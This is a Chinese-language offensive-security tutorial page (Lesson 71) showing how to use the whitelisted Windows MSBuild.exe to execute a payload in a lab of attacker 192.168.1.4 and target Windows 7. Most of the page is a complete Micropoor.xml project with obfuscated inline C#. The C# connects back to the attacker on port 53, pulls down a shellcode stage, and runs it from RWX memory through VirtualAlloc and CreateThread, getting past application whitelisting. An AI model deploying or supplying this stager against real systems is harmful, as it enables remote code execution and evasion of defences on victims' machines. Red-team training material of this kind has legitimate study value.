第七十一课：基于白名单Msbuild.exe执行payload第一季

Search…
MSBuild简介：
MSBuild 是 Microsoft Build Engine 的缩写，代表 Microsoft 和 Visual Studio的新的生成平台。MSBuild在如何处理和生成软件方面是完全透明的，使开发人员能够在未安装Visual Studio的生成实验室环境中组织和生成产品。
MSBuild 引入了一种新的基于 XML的项目文件格式，这种格式容易理解、易于扩展并且完全受 Microsoft 支持。MSBuild项目文件的格式使开发人员能够充分描述哪些项需要生成，以及如何利用不同的平台和配置生成这些项。
说明：Msbuild.exe所在路径没有被系统添加PATH环境变量中，因此，Msbuild命令无法识别。
基于白名单MSBuild.exe配置payload：
Windows 7默认位置为：
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
Copied!
攻击机：192.168.1.4 Debian
靶机： 192.168.1.3 Windows 7
靶机执行：
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Micropoor.xml
Copied!
配置攻击机msf：
附录：Micropoor.xml
注：x86 payload
1
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2
​
3
<!‐‐ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj Micropoor ‐‐>
4
​
5
<Target Name="iJEKHyTEjyCU">
6
​
7
<xUokfh />
8
​
9
</Target>
10
​
11
<UsingTask
12
​
13
TaskName="xUokfh"
14
​
15
TaskFactory="CodeTaskFactory"
16
​
17
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
18
​
19
<Task> 
20
​
21
<Code Type="Class" Language="cs">
22
​
23
<![CDATA[
24
​
25
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
26
​
27
public class xUokfh : Task, ITask {
28
​
29
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
30
​
31
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM,IntPtr adztSHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
32
​
33
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
34
​
35
static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
36
​
37
IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx), XBUCexXIrGIEpe);
38
​
39
Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
40
​
41
try { zCoDOd.Connect(DRHsPzS); }
42
​
43
catch { return null;}
44
​
45
byte[] OCrGofbbWRVsFEl = new byte[4];
46
​
47
zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
48
​
49
int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
50
​
51
byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
52
​
53
int GFtbdD = 0;
54
​
55
while (GFtbdD < auQJTjyxYw)
56
​
57
{ GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw ‐ GFtbdD) < 4096 ? (auQJTjyxYw ‐ GFtbdD) : 4096, 0);}
58
​
59
byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
60
​
61
Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0] = 0xBF;
62
​
63
return MlhacMDOKUAfvMX;}
64
​
65
static void NkoqFHncrcX(byte[] qLAvbAtan) {
66
​
67
if (qLAvbAtan != null) {
68
​
69
UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
70
​
71
Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx), qLAvbAtan.Length);
72
​
73
IntPtr WCUZoviZi = IntPtr.Zero;
74
​
75
UInt32 JhtJOypMKo = 0;
76
​
77
IntPtr UxebOmhhPw = IntPtr.Zero;
78
​
79
WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
80
​
81
WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }} 
82
​
83
public override bool Execute()
84
​
85
{
86
​
87
byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.1.4", 53);
88
​
89
NkoqFHncrcX(uABVbNXmhr); 
90
​
91
return true; } }
92
​
93
]]>
94
​
95
</Code>
96
​
97
</Task>
98
​
99
</UsingTask>
100
​
101
</Project>
Copied!
Micropoor
71-80课
第七十二课：基于白名单Installutil.exe执行payload第二季
Last modified 2yr ago
Copy link
Contents